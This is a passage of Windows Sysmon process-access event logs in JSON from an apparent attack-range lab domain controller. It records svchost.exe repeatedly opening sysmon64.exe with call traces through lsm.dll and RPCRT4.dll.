C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1778,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1779,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1780,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1781,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1782,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1783,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1784,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1785,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 